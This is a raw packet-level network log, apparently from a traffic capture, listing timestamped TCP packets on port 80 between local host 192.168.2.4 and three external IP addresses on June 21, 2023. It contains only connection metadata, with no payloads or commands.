                                                                                                  Jun 21, 2023 20:23:41.618354082 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.618406057 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.618454933 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.618472099 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.618500948 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.618546963 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.618560076 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.618592978 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.618639946 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.618654013 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.618685961 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.618700981 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.618731976 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.618777037 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.618799925 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.618844986 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.618899107 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.618947983 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.618984938 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.618993044 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619028091 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619038105 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619065046 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619082928 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619090080 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619128942 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619172096 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619180918 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619196892 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619251013 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619306087 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619318008 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619350910 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619350910 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619398117 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619407892 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619453907 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619456053 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619517088 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619565964 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619585991 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619611025 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619657040 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619673014 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619704962 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619710922 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619750977 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619766951 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619796991 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619843960 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619873047 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619889021 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619919062 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619935036 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.619941950 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.619982004 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.620028019 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.620031118 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.620052099 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.620078087 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.620148897 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.625420094 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.730176926 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.730256081 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.730312109 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.730346918 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.730370045 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.730397940 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.730456114 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.730465889 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.730483055 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.730525017 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.730571985 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.730581999 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.730618000 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.730756044 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.776361942 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.776422977 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.776475906 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.776525021 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.776537895 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.776572943 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.776623011 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.776629925 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.776644945 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.776670933 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.776710987 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.776719093 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.776740074 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.776808977 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.873505116 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.873558998 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.873611927 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.873657942 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.873651028 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.873703957 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.873704910 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.873744965 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.873753071 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.873764038 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.873791933 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.873809099 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.873848915 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.875864983 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.875911951 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.875960112 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.875962019 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876002073 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876008034 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876044989 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876054049 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876066923 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876101971 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876131058 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876149893 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876151085 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876194954 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876255035 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876280069 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876329899 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876353025 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876374960 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876379967 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876420021 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876466036 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876511097 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876526117 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876558065 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876590967 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876606941 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876610041 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876652956 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876698971 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876728058 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876745939 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876775980 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876791000 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876828909 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876838923 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876852989 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876883984 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876900911 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.876931906 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876981020 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.876995087 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.877027988 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.877041101 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.877074003 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.877091885 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.877177954 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.954967976 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.984029055 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.984091997 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.984106064 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.984139919 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.984159946 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.984211922 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.984241962 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.984287977 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:42.059204102 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:42.059294939 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:42.060004950 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:42.313457966 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.621838093 CEST4969280192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:23:42.639309883 CEST8049692188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.639395952 CEST4969280192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:23:42.676558971 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:42.693484068 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.695854902 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:42.696186066 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:42.696244001 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:42.712970018 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.713181019 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.832304955 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.832377911 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.832541943 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:42.878317118 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:42.878371954 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:42.895226955 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.895267010 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.965008020 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.965100050 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.965169907 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.965235949 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.965291023 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:42.965291977 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.965331078 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:42.965342045 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.965387106 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.965434074 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.965492010 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:42.965821028 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.965869904 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.965913057 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.965970039 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:42.965981960 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:42.966065884 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.008904934 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.008935928 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.008961916 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.008987904 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.009052038 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.009119034 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.009195089 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.009224892 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.009248018 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.009267092 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.009371996 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.009371996 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.010109901 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.010137081 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.010160923 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.010185957 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.010327101 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.011039972 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.011100054 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.011127949 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.011156082 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.011200905 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.011322021 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.011831045 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.011854887 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.011873007 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.011899948 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.011945963 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.012650013 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.012761116 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.012792110 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.012815952 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.012887955 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.059094906 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.059145927 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.059181929 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.059217930 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.059510946 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.059556961 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.059581041 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.059592962 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.059626102 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.059667110 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.060436010 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.060476065 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.060499907 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.060509920 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.060545921 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.060556889 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.060787916 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.061342001 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.061393976 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.061438084 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.061471939 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.061481953 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.061645985 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.062169075 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.062205076 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.062237978 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.062283993 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.062285900 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.062485933 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.063165903 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.063194990 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.063222885 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.063257933 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.063303947 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.063633919 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.064003944 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.064035892 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.064063072 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.064074993 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.064091921 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.064279079 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.064965963 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.064994097 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.065018892 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.065046072 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.065522909 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.065788031 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.065814972 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.065841913 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.065866947 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.065886974 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.066706896 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.066732883 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.066759109 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.066761971 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.066786051 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.066803932 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.066826105 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.067708969 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.067828894 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.067857027 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.067882061 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.067909002 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.067929983 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.068703890 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.068751097 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.098987103 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.099021912 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.099051952 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.099083900 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.099329948 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.099363089 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.099394083 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.099394083 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.099426031 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.099435091 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.099622965 CEST4969780192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:23:43.104201078 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.104307890 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.104336023 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.104361057 CEST8049697104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:23:43.104387045 CEST8049697104.21.18.99192.168.2.4
